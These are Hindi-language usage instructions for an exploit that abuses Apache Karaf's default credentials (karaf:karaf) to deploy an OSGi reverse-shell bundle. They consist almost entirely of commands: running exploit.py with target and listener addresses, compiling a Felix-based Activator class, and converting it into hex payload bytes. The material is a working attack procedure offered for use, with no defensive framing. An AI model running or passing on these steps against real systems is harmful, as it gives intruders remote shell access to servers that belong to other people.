
Apache Karaf का डिफ़ॉल्ट क्रेडेंशियल के साथ शोषण करके रिमोट शेल एक्सेस के लिए OSGi रिवर्स शेल पेलोड तैनात करें।
python exploit.py --help
python exploit.py --rhost=192.168.0.133 --rport=1337 --lhost=192.168.0.100 --lport=4444 --creds=karaf:karaf
mkdir -p ./revshell/lib
org.apache.felix.main.distribution-7.0.5/bin/felix.jar को ./revshell/lib/felix.jar में कॉपी करेंcd revshell/bundle
javac -d ../classes -cp ../lib/felix.jar com/visionspace/osgi/revshell/Activator.java
हेक्स मान exploit में रिवर्स शेल बनाते हैं
./class_to_payload.py revshell/classes/com/visionspace/osgi/revshell/Activator.class